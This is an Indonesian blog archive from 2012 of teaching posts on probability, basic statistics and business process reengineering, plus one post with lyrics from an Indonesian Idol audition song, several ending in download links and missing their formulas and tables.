Statistik Probabilitas

•10 Mei 2012 • Tinggalkan sebuah Komentar

Ada tiga lingkungan dalam proses pengambilan keputusan yang telah dijadikan dalil yakni  pasti, ketidakpastian dan risiko. Risiko adalah suatu keadaan dimana nilai-nilai peluang dapat diberikan kepada setiap hasil atau peristiwa. Sampai seberapa jauh keputusan diambil dalam suatu risiko tergantung pada siapa yang akan mengambil keputusan tersebut apakah para pebisnis, industriawan atau tingkatan menajerial dalam suatu organisasi. Akan tetapi, meskipun keputusan semacam ini boleh dibilang langka namun tetap perlu menjadi bahan pertimbangan. Sebagai contoh industri asuransi tetap mempercayai nilai-nilai peluang yang diambil dari data aktuaria. Kesalahan yang dilakukan perusahaan ini dalam menggunakan nilai-nilai peluang untuk membuat keputusan bisa berakibat fatal bagi perusahaan tersebut. Dalam kasus lain, masalah yang dihadapi oleh para manajer dalam mengambil keputusan adalah bagaimana menggunakan nilai-nilai peluang dalam situasi yang sebenarnya dan bagaimana menarik kesimpulan dari hasil yang didasarkan pada teori peluang.

          Kapan tepatnya teori peluang masuk ke dalam dunia statistika belum diketahui secara pasti. Meskipun teori peluang sudah dikenal sejak abad 17 oleh para matematikawan, tetapi masih diragukan kapan teori ini berhubungan dengan statistika. Sejalan dengan perkembangan ilmu pengetahuan, perkawinan antara matematika peluang dengan data yang dikumpulkan oleh negara-negara di berbagai penjuru dunia akhirnya melahirkan ilmu baru yaitu statistika.

          Tidak dapat dipungkiri lagi berkembangnya teori peluang diawali oleh kesenangan orang untuk mengadu untung di meja judi. Lahirnya berbagai teori peluang yang dilandasi dari kesenangan ini telah banyak mempengaruhi perkembangan ilmu statistika itu sendiri. Seseorang tidaklah mungkin untuk memahami statistika secara sempurna tanpa memahami apa arti peluang itu sendiri. Olehkarena itu dapatlah dikatakan bahwa teori peluang adalah fondasi dari statistika.

          Penggunaan teori peluang dalam bidang bisnis sudah cukup lama dikenal oleh para pebisnis. Meski banyak diantara mereka tidak memiliki latarbelakang matematika namun istilah peluang, disadari atau tidak, banyak berperan ketika mereka menjalankan aktivitas organisasi khususnya dalam proses pengambilan keputusan. Olehkarena itu untuk memberikan gambaran tentang peluang yang dimaksud, bab ini hanya membahas dasar-dasar teori peluang sebagai dasar pengetahuan untuk memahami analisis statistika selanjutnya. Bagi yang ingin mendalami teori peluang dapat melihat pada buku-buku yang tercantum dalam daftar pustaka.

Pengertian Peluang

Peluang semata-mata adalah suatu cara untuk menyatakan kesempatan terjadinya suatu peristiwa. Secara kualitatif peluang dapat dinyatakan dalam bentuk kata sifat untuk menunjukkan kemungkinan terjadinya suatu keadaan seperti “baik”, “lemah”, “kuat”, “miskin”, “sedikit” dan lain sebagainya. Secara kuantitatif, peluang dinyatakan sebagai nilai-nilai numeris baik dalam bentuk pecahan maupun desimal antara 0 dan 1. Peluang sama dengan 0 berarti sebuah peristiwa tidak bisa terjadi sedangkan peluang sama dengan 1 berarti peristiwa tersebut pasti terjadi.

Dalam kehidupan sehari-hari kita sering mendengar perkiraan terjadinya hujan dalam bentuk peluang baik secara kualitatif seperti “kemungkinannya kecil akan terjadi hujan esok hari”, atau dalam bentuk kuantitatif seperti “kemungkinan hujan esok hari sekitar 30%”. Jelas di sini bahwa berbicara mengenai peluang kita dihadapkan dalam suatu kondisi yang tidak pasti, akan tetapi kita hanya diberikan suatu petunjuk atau gambaran seberapa besar keyakinan kita bahwa suatu peristiwa bisa terjadi. Semakin besar nilai peluang yang dihasilkan dari suatu perhitungan maka semakin besar keyakinan kita bahwa peristiwa itu akan terjadi. Dewasa ini, perkiraan tentang akan terjadinya suatu gejala alam bukanlah sesuatu pekerjaan sederhana akan tetapi telah melalui suatu proses perhitungan yang sangat kompleks. Gejala sebuah peristiwa tidak hanya dikaji dari satu sisi saja, misalnya pengaruh waktu, akan tetapi juga melibatkan banyak variabel yang terkait dengan peristiwa tersebut.  Olehkarena itu peluang yang didasarkan pada latar belakang ilmiah bisa memberikan tingkat keyakinan yang lebih tinggi bagi orang yang memerlukannya.

Salah satu cara untuk menyatakan peluang dari suatu peristiwa adalah penggunaan diagram Venn seperti yang dilukiskan dalam gambar 1.  Meski konvensional, tetapi cara ini ternyata lebih mudah dipahami oleh masyarakat luas khususnya bagi orang-orang yang bukan berlatar belakang matematika. Diagram Venn berbentuk persegi panjang untuk menyatakan semua peristiwa yang bisa terjadi dan lingkaran untuk menggambarkan peluang terjadinya peristiwa tertentu. Pengambaran diagram umumnya tidak menggunakan skala yang sesungguhnya, artinya jika peluang terjadi peristiwa hujan 30% bukan berarti bahwa lingkaran yang dimaksud luasnya harus 30% dari luas persegi panjang.

Istilah peristiwa yang kita kenal sehari-hari seringkali agak berbeda makna  jika kita berbicara tentang teori peluang. Biasanya orang berpikir bahwa peristiwa adalah suatu kejadian layaknya peristiwa sejarah, gejala-gejala fisik, pesta dan lain sebagainya. Dalam statistika, pengertian ini diperluas dengan memasukkan unsur-unsur kesempatan atau peluang atas terjadinya suatu peristiwa yang didasarkan pada hasil sebuah percobaan atau eksperimen yang dilakukan secara berulang-ulang. Sebagai contoh peristiwa terambilnya kartu As dari setumpuk kartu bridge, jumlah cairan yang disaring dari mesin pengisi, jumlah kendaraan niaga yang melalui jalan protokol, jumlah barang yang cacat dalam satu lot, dan karakteristik lainnya yang secara umum tidak dapat disebutkan sebagai peristiwa.
Untuk keperluan penentuan peluang ada gunanya untuk membagi peristiwa ke dalam dua jenis peristiwa yakni peristiwa sederhana dan peristiwa majemuk. Peristiwa sederhana tidak dapat dibagi lebih lanjut lagi ke dalam komponen-komponen peristiwa, sedangkan peritiwa majemuk selalu memiliki dua atau lebih komponen peristiwa sederhana. Peristiwa “Kartu Sekop” secara definisi adalah peristiwa sederhana karena hanya ada satu jenis kartu sekop dalam setumpuk kartu bridge. Akan tetapi peristiwa “As Sekop” dapat dianggap sebagai peristiwa majemuk karena kartunya haruslah berisikan keduanya yakni kartu As dan kartu Sekop.  Namun definisi ini tergantung dari pandangan si pelaku percobaan. Bisa saja seseorang mengatakan bahwa As Sekop sebagai suatu peristiwa sederhana jika dia mengganggap hal ini sebagai suatu kesatuan. Pembagian jenis peristiwa ini dimaksudkan untuk kemudahan dalam mempelajari teori peluang selanjutnya.

PELUANG LOGIS, EMPIRIS DAN SUBJEKTIF

Untuk peristiwa sederhana, peluang dapat diturunkan baik secara logis, melalui pengamatan empiris maupun secara subjektif. Ketiga bentuk peluang ini mempunyai implikasi yang penting bagi para manajer khususnya dalam proses pengambilan keputusan.

Peluang Logis
Semua proses yang bisa diprediksi dan didefinisikan secara lengkap memungkinkan kita secara deduktif menentukan peluang dari hasil yang terjadi. Sayangnya banyak para pebisnis yang tidak masuk dalam kategori ini. Sebenarnya penurunan peluang logis adalah sesuatu yang  berharga untuk dikaji, karena kemampuan memprediksi proses sederhana kerapkali bisa memberikan petunjuk bagi para manajer untuk memperbaiki tindakan-tindakan dalam menghadapi situasi yang kompleks atau tidak dapat diprediksi.
Peluang logis sebenarnya didasarnya pada pertimbangan logika semata, bukan berdasarkan hasil percobaan. Tetapi hasil ini bisa diuji melalui suatu percobaan. Pelemparan dua buah dadu yang merupakan salah satu upaya keras tertua dalam pengembangan teori peluang, bisa diambil sebagai contoh dari penurunan peluang logis ini.  Pada pelemparan dua buah dadu kita tahu bahwa jumlah angka dari kedua dadu yang bisa muncul adalah 2, 3, 4, 5, …, 12 atau ada 11 peristiwa yang berbeda. Berapa peluang munculnya jumlah 5? Meski peristiwa jumlah 5 ada 1 dari 11 peristiwa,  tidak berarti bahwa peluangnya adalah 1/11. Mengapa demikian, karena kita tidak mempertimbangkan bagaimana berbagai peristiwa bisa dihasilkan. Perhatikan Tabel 1 yang merupakan matriks dari semua kombinasi peristiwa yang mungkin terjadi dalam pelemparan dua buah dadu. Dari sini tampak bahwa ada 36 kombinasi yang mungkin. Peristiwa “jumlah 5” adalah hasil dari kombinasi 4 peristiwa. Berarti peluang munculnya jumlah 5 pada pelemparan dua buah dadu adalah 4/36 atau sekitar 0,11.

Tabel 1.  Empat cara munculnya jumlah 5

        dari pelemparan dua dadu

 Definisi : Peluang logis dari sebuah peristiwa adalah rasio antara jumlah peristiwa yang bisa terjadi dengan jumlah semua hasil yang bisa terjadi, dimana hasil ini dapat diturunkan dari sebuah eksperimen.

Atau secara notasi

Peluang Empiris

 

Banyak kasus dimana para manajer kurang mengikuti pola-pola peluang seperti yang dijelaskan di atas. Kemungkinan besar hal ini disebabkan tidak dipahaminya apa sebenarnya peluang itu. Untuk kasus seperti ini, yang lebih cocok untuk diacu adalah peluang yang didasarkan pada data pengamatan atau data empiris. Ambil contoh sebagai berikut.

Dalam memproduksi sebanyak 10.000 unit integrated circuit (IC) merek tertentu, diperoleh 25 unit diantaranya cacat (bengkok). Berdasarkan hasil ini maka dapat dikatakan bahwa peluang IC yang cacat adalah 25/10.000 = 0,0025. Nilai ini juga merupakan peluang terambilnya secara acak 1 unit IC yang cacat. Demikian pula rata-rata persentase barang cacat dalam suatu batch diperkirakan sebesar 0,0025.  Jika ada pesanan sebanyak 2.000 unit IC dari perusahaan ini kita berharap 0,0025(2000) = 5 unit IC yang cacat.     

Peluang empiris atau ada pula yang menyebutnya sebagai peluang objektif, hanya bisa diperoleh melalui percobaan atau eksperimen yang dilakukan secara berulang-ulang, dalam kondisi yang sama dan diharapkan dalam jumlah yang besar. Dari eksperimen ini akan dihasilkan informasi berupa frekuensi relatif yang sangat berguna khususnya untuk keperluan perbaikan sebuah sistem. Misalnya saja dalam proses pengemasan susu ingin diketahui berapa persen kemasan yang berisikan lebih dari 150 ml. Dari proses pengisian yang cukup lama, maka bisa dibuat distribusi frekuensi volume susu yang terisi kedalam kotak atau susu yang tercecer pada setiap pengisian. Dari sini maka akan akan diperoleh informasi yang sangat berguna untuk melakukan penyesuaian terhadap sistem kerja mesin pengisi susu tersebut.

Selanjutnya download saja DiSini :

Lima Tahap Rekayasa Ulang Cepat (The Five Stages of Rapid Reengineering)

•21 April 2012 • Tinggalkan sebuah Komentar

Metodologi Business Process Reengineering (BPR) disebut juga dengan Rapid Reengineering atau Rapid Re karena dirancang untuk menghasilkan hasil yang mendasar serta cepat, kira-kira 6 bulan sampai 1 tahun. Lihat gambar-2.1.
Hal ini didorong oleh keinginan manajer senior yang ingin segera melihat hasil secara cepat, yang dapat digunakan untuk menempatkan dasar keberhasilan mendatang. Pada saat yang sama, proyek reengineering akan meningkatkan tekanan dalam organisasi, yang menyebabkan setiap orang menunggu dengan kawatir untuk melihat bagaimana proyek akan berpengaruh terhadap mereka. Rapid Re dilandasi dengan kenyataan dan dirancang untuk menghasilkan secara cepat. Rapid Re dirancang untuk merealisasikan manfaat yang dapat dicapai dalam kerangka waktu tertentu dan selajutnya menempatkan tahapan untuk perbaikan jauh kedepan.
Rapid Re terdiri dari 5 tahap, yaitu:
– Preparation (persiapan)
– Identification (Identifikasi)
– Vision (Visi)
– Solution (Solusi)
– Transformation (Transformasi)
Setiap tahap dirancang secara berurutan. Tahap solusi dibagi lagi menjadi desain teknis dan desain sosial, keduanya dapat dilaksanakan secara bersamaan. Akhir dari setiap tahapan dinyatakan dalam suatu milestone proyek reengineering. Tahapan-tahapan tersebut selanjutnya dibagi kedalam task(tugas), terdapat 54 tugas seluruhnya.

Rapid Re dapat diatur sesuai kebutuhan dari setiap proyek reengineering. Masing-masing proyek tugas-tugas akan dilompati, disusun, atau dikombinasikan lagi untuk memenuhi kebutuhan atau akan diberikan lebih besar atau lebih kecil menekankan pada sejumlah tugas.
Rapid Re tidak beranggapanpada organisasi tertentu untuk tim proyek rekayasa ulang, meskipun kami berikan dalam menghubungkan dengan task 1.3. Rapid Re dirancang memerlukan sedikit mungkin alat. Rapid Re dapat dilakukan dengan pensil, kertas, diagram alir, dan sejumlah formulir.
Untuk mengilustrasikan metodologi Rapid Re akan digunakan contoh perluasan dari Perusahaan Mainan ABC. Adapun ilustrasinya adalah ssebagai berikut:
Perusahaan mainan ABC adalah sebuah industri mainan dari plastik yang menggambarkan karakter tokoh yang bersumber dari buku maupun film karton. Mereka menjual tokoh-tokoh ini melalui penjualan langsung pada berbagai jaringan toko nasional maupun regional. Setiap bulan Februari ada pameran mainan di kota New York yang menampilkan produk-produk baru dari para produsen mainan kepada pembeli. Setelah itu, pelanggan di beri kesempatan melakukan pemesanan, pada penjualan di hari natal yang disertai ucapan terima kasih, yang melampai 1/3 transaksi penjualan selama setahun. Di tingkat toko atau pusat distribusi terjadi penurunan sediaan, para pembeli melakukan pemesanan ulang. Setelah dipertimbangkan semuanya, ABC menerima 80% dari pesanannya dalam 6 bulan terakhir pada setiap tahun. Saat ini, ABC mempunyai penjualan sebesar $50 juta/tahun dan 500 karyawan.
Hingga tahun 1990, ABC menguasai 50% pasar dari pesaingnya XYZ plastic. Lokasi industri ABC di Amerika Serikat, sedang XYZ plastic produksinya di Timur Jauh. Sebagai hasilnya, harga XYZ lebih murah daripada ABC. Tetapi juga pemenuhan pesanan dan pengiriman dari XYZ memerlukan waktu lama dari Timur Jauh, XYZ sering kali dingalami ketidakcukupan sediaan atau terjadi kesalahan, sehingga tidak mampu memenuhi pesanan pelanggannya dengan tepat. Selanjutnya, sejak tahun 1990 XYZ meningkatkan kinerjanya dalam memenuhi pesanan pelanggannya sambil menjaga harganya tetap berada dibawah produk ABC. Akibatnya, ABC kehilangan pangsa pasar, hingga tinggal 40%.
Dari uraian diatas, tuangkan kedalam 5 langkah Rapid Re, berikut ini:

TAHAP 1: PERSIAPAN
Tujuan dari tahap ini adalah untuk menggerakkan, mengorganisir, dan menyemangati tim yang akan melakukan rekayasa ulang. Tahap persiapan menghasilkan amanat melakukan perubahan, mengorganisir, struktur, dan memberikan hak khusus pada tim rekayasa ulang; serta suatu rencana permainan.
Pertanyaan kunci yang harus dijawab pada tahap ini adalah :

  • Apa tujuan dan harapan dari eksekutif senior? Seberapa besar komitmennya pada proyek ini?
  • Apa tujuan dari proyek ini? Seberapa agresifkah yang dapat dibuatnya tanpa merasa dikorbankan?
  • Siapa yang harus berada pada tim? Komposisi ketrampilan/kemampuan apa yang harus berada dalam tim?
  • Ketrampilan rekayasa ulang apakah yang dibutuhkan anggota tim untuk dipelajari?
  • Apa yang kita perlukan untuk berkomunikasi dengan karyawan untuk mendapatkan dukungan dan kepercayaan mereka?

Tahap persiapan terdiri dari 4 tugas :

  1. Mengenali kebutuhan
  2. Mengembangkan konsensus eksekutif
  3. Melatih tim rekayasa ulang
  4.  Merencanakan perubahan

Task 1.1 – Mengenali Kebutuhan
Kebutuhan rekayasa ulang biasanya dikenal sebagai suatu hasil dari suatu perubahan:

  1. Perubahan pasar
  2. Perubahan teknologi, atau
  3. Perubahan lingkungan

Sebagai konsekuensi dari perubahan tersebut, manager senior termotivasi oleh:

  • Perusahaan merasa sakit (misal: keuntungan rendah, pangsa pasar menyusut)
  • Kekawatiran (misal: persaingan yang agresif, perubahan pasar) atau
  • Ambisi (perluasan pangsa pasar, memasuki pasar baru)

Dalam studi kasus ini perusahaan mainan ABC merasa sakit dan kawatir: Ia telah kehilangan lebih dari 10% pangsa pasarnya dan kawatir akan kehilangan lebih banyak lagi.
BPR tidak bisa dikendalikan dari sisi persediaan, yaitu:

  • konsultan internal dan eksternal
  • rekayasa industri, atau
  •  sistem kepegawaian

Alasan rekayasa ulang:

  • dampak BPR begitu besar hanya manajer senior yang bisa menyetujuinya,
  • rekayasa ulang pergeseran budaya, dan
  • rekayasa ulang kepemimpinan.

Langsung Download Filenya :

Diagram Alir Dokumen SOP (Study Kasus)

•12 April 2012 • Tinggalkan sebuah Komentar

Study Kasus :

Sebuah perusahaan menjual 5 macam produk, setiap produk tersebut di satu gudang yang terletak terpisah dalam kompleks pabrik. Pesanan yang di terima pelanggan umumnya terdiri dari lebih dari satu produk, dalam melayani pesanan dari pelanggan, perusahaan menghendaki pengiriman secara bersamaan untuk berbagai jenis produk  produk yang tercantum dalam order dari pelanggan. Oleh karena itu, perusahaan memilih unit Shipping Order Procedure dalam sistem penjualan kreditnya. Buatlah bagan alir dokumen sistem penjualan kredit perusahaan tersebut.

Ku Ingin Kita Lama Pacaran Di Sini (Neng Neng Nong Neng) Audisi Indonesian Idol 2012

•11 April 2012 • Tinggalkan sebuah Komentar

Sebelumnya Muhammad Ridho adalah si penjual roti. Kini Muhammad Ridho di gemari masyarakat karena mempunyai pribadi yang unik dari salah seorang peserta audisi Indonesia Idol di Bandung. Perasaan Video M Ridho Neng Nong Audisi Indonesian Idol 2012 terharu, lucu jadi campur aduk saat melihat penampilan Muhammad Ridho menyanyikan sebuah lagu ciptaannya sendiri yang Video M Ridho Neng Nong Audisi Indonesian Idol 2012 berjudul Kuingin kita lama pacaran disini.

Memang namanya rejeki tidak akan lari kemana. Lagu tersebut ternyata di beli oleh Ahmad Dhani seharga lima juta. Tidak hanya itu, Ahmad Dhani pun akan memberikan royalti untuk Video M Ridho Neng Nong Audisi Indonesian Idol 2012 lagu ini nantinya. Walau tidak lulus audisi Indonesian Idol, tapi setidaknya Muhammad Ridho  sudah sangat menghibur.

Neng neng nong neng nong nang nong
Neng neng nong neng nong nang nong
Neng neng nong neng nong nang nong
Neng neng nong neng [3x]

Kau cintaku, kau sayangku, kau pacarku, diriku
Kau indahku, kau kasihku, kau sayangku, diriku

Neng neng nong neng nong nang nong
Neng neng nong neng nong nang nong
Neng neng nong neng nong nang nong
Neng neng nong neng

Kau manisku, kau cantikku, kau sayangku, diriku
Kau cintaku, kau rinduku, kau sayangku, diriku

Ku ingin kita lama pacaran di sini
Ku ingin kita bisa sampai akhir hidup
Ku ingin dan ku ingin
Inginkan dirimu, inginkan dirimu tuk selamanya

Neng neng nong neng nong nang nong
Neng neng nong neng nong nang nong
Neng neng nong neng nong nang nong
Neng neng nong neng

Kau manisku, kau cantikku, kau sayangku, diriku
Kau cintaku, kau rinduku, kau sayangku, diriku

Ku ingin kita lama pacaran di sini
Ku ingin kita bisa sampai akhir hidup
Ku ingin dan ku ingin
Inginkan dirimu, inginkan dirimu tuk selamanya

Download lagu Neng Neng Nong Neng, setelah di Aransemen (Bukan Ahmad Dhani) :

Statistik Dasar

•4 April 2012 • Tinggalkan sebuah Komentar

Download Bahan Ajar Statistik Dasar di sini, semoga bermanfaat… ”

Ukuran Penyimpangan

•4 April 2012 • Tinggalkan sebuah Komentar

Ukuran pemusatan yaitu mean, median dan modus, merupakan informasi yang memberikan penjelasan kecenderungan data sebagai wakil dari beberapa data yang ada. Adapun ukuran penyebaran(simpangan) data memberikan gambaran seberapa besar data menyebar dari titik-titik pemusatan.

Ukuran  penyebaran atau nilai ukuran variasi data digunakan :

ü  untuk melihat  penyimpangan data dari nilai pemusatannya

ü  untuk mengukur keragaman data

Ukuran penyebaran meliputi jangkauan (range), simpangan rata-rata (deviasi ratarata) dan simpangan baku (deviasi standar).

Jangkauan (Range)

Ukuran penyebaran yang paling sederhana (kasar) adalah jangkauan (range) atau rentangan nilai, yaitu selisih antara data terbesar dan data terkecil. Untuk range data dirumuskan dengan:

Contoh soal
Tentukan range dari data-data di bawah ini.
6, 7, 3, 4, 8, 3, 7, 6, 10, 15, 20

Penyelesaian
Dari data di atas diperoleh xmaks = 20 dan xmin = 3
Jadi, R = xmaks – xmin = 20 – 3 = 17

Untuk data sudah dikelompokkan dalam bentuk tabel distribusi frekuensi, maka  nilai tertinggi diambil dari nilai tengah kelas tertinggi dan nilai terendah diambil dari nilai kelas yang terendah.

Contoh soal
Tentukan range dari tabel berikut ini.
Penyelesaian

Simpangan Rata-Rata (Deviasi Rata-Rata)
Simpangan rata-rata suatu data adalah nilai rata-rata dari selisih setiap data dengan nilai rata-rata hitung. Simpangan rata-rata data dirumuskan sebagai berikut

Keterangan:
SR = simpangan rata-rata
n = ukuran data
xi = data ke-i dari data x1, x2, x3, …, xn
x = rataan hitung

Contoh soal
Diketahui data: 7, 6, 8, 7, 6, 10, 5. Tentukan simpangan rata-ratanya.

Selengkapnya, Download file complete :

Ukuran Letak [Statistik Dasar]

•4 April 2012 • Tinggalkan sebuah Komentar

 

Selain ukuran memusat, ada juga yang disebut ukuran letak. Adapun ukuran letak meliputi: kuartil (Q), desil (D), dan persentil (P).

Kuartil (Q)
Seperti yang sudah dibahas sebelumnya, bahwa median membagi data yang telah diurutkan menjadi dua bagian yang sama banyak. Adapun kuartil adalah membagi data yang telah diurutkan menjadi empat bagian yang sama banyak.

Keterangan:

 xmin = data terkecil

xmaks = data terbesar

Q1 = kuartil ke-1

Q2 = kuartil ke-2

Q3 = kuartil ke-3

 

Untuk mencari kuartil data tunggal telah dibahas pada sub bab statistik lima serangkai. Pada sub bab ini akan diberikan rumus yang lebih mudah jika data yang disajikan lebih banyak.

Letak dari Qi dirumuskan sebagai berikut.

Keterangan:

Qi = kuartil ke-i

n = banyak data

 

Contoh soal

 

1. Tentukan Q1, Q2, dan Q3 dari data : 3, 4, 7, 8, 7, 4, 8, 4, 9, 10, 8, 3, 7, 12.

Penyelesaian

Data yang telah diurutkan: 3, 3, 4, 4, 4, 7, 7, 7, 8, 8, 8, 9, 10, 12.

 Menentukan letak kuartil untuk data yang sudah dikelompokkan ditentukan dengan menentukan interval  Qi, kemudian nilai kuartil dirumuskan sebagai berikut.

Keterangan:

Qi = kuartil ke-i (1, 2, atau 3)

bi = tepi bawah kelas kuartil ke-i

N = banyaknya data

F = frekuensi kumulatif kelas sebelum kelas kuartil

l = lebar kelas

f = frekuensi kelas kuartil

 

Selengkapnya, Download file :

 

Ukuran Pemusatan [Statistik Dasar]

•4 April 2012 • 2 Komentar

Pendahuluan

Ukuran pemusatan serta penafsirannya suatu rangkaian data adalah suatu nilai dalam

rangkaian data yang dapat mewakili rangkaian data tersebut. Suatu rangkaian data  biasanya  mempunyai kecenderungan untuk terkonsentrasi atau terpusat pada nilai pemusatan ini.

Ukuran statistik yang dapat menjadi pusat dari rangkaian data dan memberi gambaran singkat tentang data disebut ukuran pemusatan data. Ukuran pemusatan data dapat digunakan untuk menganalisis data lebih lanjut.

 

Ukuran pemusatan data dapat dilihat diantaranya melalui :

  1. Rata-rata hitung ( Mean)
  2. Nilai tengah (Median )
  3. Modus
  4. Rata-rata terbobot
  5. Rata-rata ukur

 Rata-rata hitung ( Mean)

Rata-rata hitung adalah ukuran pemusatan yang sering digunakan. Kelemahan ukuran rata-rata hitung jika digunakan sebagai ukuran pemusatan adalah apabila ada data yang sangat ekstrim.

Rata-rata dari sekumpulan data yang banyaknya n adalah jumlah data dibagi dengan banyaknya data.

Keterangan:
n = banyaknya data
xi = data ke-i

Contoh soal
1.    Dari hasil tes 10 siswa kelas XI diperoleh data: 3, 7, 6, 5, 3, 6, 9, 8, 7, dan 6. Tentukan rataan dari data tersebut.
Penyelesaian
Jadi, rataannya adalah 6,0.

2. Berdasarkan data hasil ulangan harian Matematika di kelas XI IPA, enam siswa  mendapat nilai 8, tujuh siswa mendapat nilai 7, lima belas siswa mendapat nilai 6, tujuh siswa mendapat nilai 5, dan lima siswa mendapat nilai 4. Tentukan rata-rata nilai ulangan harian Matematika di kelas tersebut.
Penyelesaian
Tabel nilai ulangan harian Matematika kelas XI IPA.

   Jadi, rataan nilai ulangan harian Matematika di kelas XI IPA adalah 6,05.

2) Rata-rata dari data distribusi frekuensi

Apabila data disajikan dalam tabel distribusi frekuensi maka rataan dirumuskan

sebagai berikut.

Keterangan:

fi = frekuensi untuk nilai xi

xi = titik tengah interval ke-i

 

Contoh soal

Tentukan  rata-rata dari data berikut

Penyelesaian

Kerjakan soal-soal di bawah ini dengan benar.

  1. Diketahui data: 5, 7, 9, 6, 4, 3, 2, 1. Hitunglah rataan hitungnya.
  2. Hitunglah rataan hitung data di bawah ini.

3.  Nilai matematika dari dua puluh siswa di kelas XI IPA adalah sebagai berikut:

Tentukan rataan hitung (mean) dari data tersebut.

4. Tentukan mean dari data berikut:

Selengkapnya, Download file complete :

Distribusi Frekuensi [Statistik Dasar]

•4 April 2012 • Tinggalkan sebuah Komentar

Data seringkali dinyatakan dalam bentuk daftar bilangan, namun kadangkala dinyatakan dalam bentuk tabel distribusi frekuensi. Tabel distribusi frekuensi tunggal merupakan cara untuk menyusun data yang relatif sedikit. Perhatikan contoh data berikut.

5, 4, 6, 7, 8, 8, 6, 4, 8, 6, 4, 6, 6, 7, 5, 5, 3, 4, 6, 6

8, 7, 8, 7, 5, 4, 9, 10, 5, 6, 7, 6, 4, 5, 7, 7, 4, 8, 7, 6

 

Dari data di atas tidak tampak adanya pola yang tertentu maka agar mudah dianalisis data tersebut disajikan dalam tabel seperti di bawah ini.  Daftar di atas sering disebut sebagai distribusi frekuensi dan karena datanya tunggal maka disebut distribusi frekuensi tunggal.

Selengkapnya, Download File :

 

Penyajian Data [Statisitk Dasar]

•4 April 2012 • Tinggalkan sebuah Komentar

Setelah  data dikumpulkan maka data disajikan. Penyajian data dibuat untuk memberikan deskripsi mengenai data yang telah dikumpulkan dan memudahkan untuk pengambilan keputusan. Bentuk penyajian data bisa dalam bentuk tabel atau grafik. Adapun fungsi penyajian data tersebut digunakan untuk :

  1. menunjukkan perkembangan suatu keadaan
  2. mengadakan perbandingan pada suatu waktu

tabel (tables) adalah angka yang disusun sedemikian rupa menurut kategori tertentu sehingga memudahkan pembahasan dan analisisnya, sedangkan grafik (graphs) merupakan gambar-gambar yang menunjukkan data secara visual, didasarkan atas nilai-nilai pengamatan aslinya ataupun dari tabel-tabel yang dibuat sebelumnya.

Penyajian data dalam bentuk tabel

Didasarkan atas pengaturan datanya, tabel dapat dibedakan atas beberapa jenis, yaitu

  1. a.             tabel klasifikasi

Tabel klasifikasi adalah tabel yang menunjukkan pengelompokkan data.

Contoh

          Tabel  jumlah kelahiran di kota ‘X’ pada th

  1. b.             tabel kontingensi

Tabel kontigensi atau biasanya disebut tabel tabulasi silang atau crosstab merupakan tabel yang disusun berdasarkan tabulasi data menurut 2 atau lebih kategori. Berikut ini contoh penyajian data dalam bentuk tabel kontigensi.

   

JURUSAN

    TI SI TK
         
         

  1. c.              Tabel distribusi frekuensi.

Tabel distribusi frekuensi adalah susunan data dalam suatu tabel yang telah diklasifikasikan menurut kelas-kelas atau kategori tertentu. Dikenal dua bentuk distribusi frekuensi menurut pembagian kelasnya, yaitu distribusi frekuensi kualitatif (kategori) dan distribusi frekuensi kuantitatif (bilangan). Pada distribusi frekuensi kualitatif pembagian kelasnya didasarkan pada kategori tertentu dan banyak digunakan untuk data berskala ukur nominal. Sedangkan kategori kelas dalam tabel distribusi frekuensi kuantitatif, terdapat dua macam, yaitu kategori data tunggal dan kategori data berkelompok (bergolong).

Berikut ini contoh tabel distribusi frekuensi untuk data kuantitatif kategori data tunggal:

Selengkapnya Download File, Complete :

Pengertian Statistik

•4 April 2012 • 3 Komentar

PENGERTIAN DASAR

 

Pendahuluan

Statistika adalah ilmu yang mempelajari bagaimana merencanakan, mengumpulkan, menganalisis, menginterpretasi, dan mempresentasikan data. Singkatnya, statistika adalah ilmu yang berkenaan dengan data.

Istilah ‘statistika’ (bahasa Inggris: statistics) berbeda dengan ‘statistik’ (statistic). Statistika merupakan ilmu yang berkenaan dengan data, sedang statistik adalah data, informasi, atau hasil penerapan algoritma statistika pada suatu data.

Dari kumpulan data, statistika dapat digunakan untuk menyimpulkan atau mendeskripsikan data; ini dinamakan statistika deskriptif. Sebagian besar konsep dasar statistika mengasumsikan teori probabilitas. Beberapa istilah statistika antara lain: populasi, sampel, unit sampel, dan probabilitas.

Statistika banyak diterapkan dalam berbagai disiplin ilmu, baik ilmu-ilmu alam (misalnya astronomi dan biologi maupun ilmu-ilmu sosial (termasuk sosiologi dan psikologi), maupun di bidang bisnis, ekonomi, dan industri. Statistika juga digunakan dalam pemerintahan untuk berbagai macam tujuan; sensus penduduk merupakan salah satu prosedur yang paling dikenal. Aplikasi statistika lainnya yang sekarang popular adalah prosedur jajak pendapat atau polling (misalnya dilakukan sebelum pemilihan umum), serta jajak cepat (perhitungan cepat hasil pemilu) atau quick count. Di bidang komputasi, statistika dapat pula diterapkan dalam pengenalan pola maupun kecerdasan buatan.

Sejarah

Penggunaan istilah statistika berakar dari istilah istilah dalam bahasa latin modern statisticum collegium (“dewan negara”) dan bahasa Italia statista (“negarawan” atau “politikus”).

Gottfried Achenwall (1749) menggunakan Statistik dalam bahasa Jerman untuk pertama kalinya sebagai nama bagi kegiatan analisis data kenegaraan, dengan mengartikannya sebagai “ilmu tentang negara (state)”. Pada awal abad ke-19 telah terjadi pergeseran arti menjadi “ilmu mengenai pengumpulan dan klasifikasi data”. Sir John Sinclair memperkenalkan nama (Statistics) dan pengertian ini ke dalam bahasa Inggris. Jadi, statistika secara prinsip mula-mula hanya mengurus data yang dipakai lembaga-lembaga administratif dan pemerintahan. Pengumpulan data terus berlanjut, khususnya melalui sensus yang dilakukan secara teratur untuk memberi informasi kependudukan yang berubah setiap saat.

Pada abad ke-19 dan awal abad ke-20 statistika mulai banyak menggunakan bidang-bidang dalam matematika, terutama peluang. Cabang statistika yang pada saat ini sangat luas digunakan untuk mendukung metode ilmiah, statistika inferensi, dikembangkan pada paruh kedua abad ke-19 dan awal abad ke-20 oleh Ronald Fisher (peletak dasar statistika inferensi), Karl Pearson (metode regresi linear), dan William Sealey Gosset (meneliti problem sampel berukuran kecil). Penggunaan statistika pada masa sekarang dapat dikatakan telah menyentuh semua bidang ilmu pengetahuan, mulai dari astronomi hingga linguistika. Bidang-bidang ekonomi, biologi dan cabang-cabang terapannya, serta psikologi banyak dipengaruhi oleh statistika dalam metodologinya. Akibatnya lahirlah ilmu-ilmu gabungan seperti ekonometrika, biometrika (atau biostatistika), dan psikometrika.

Konsep dasar

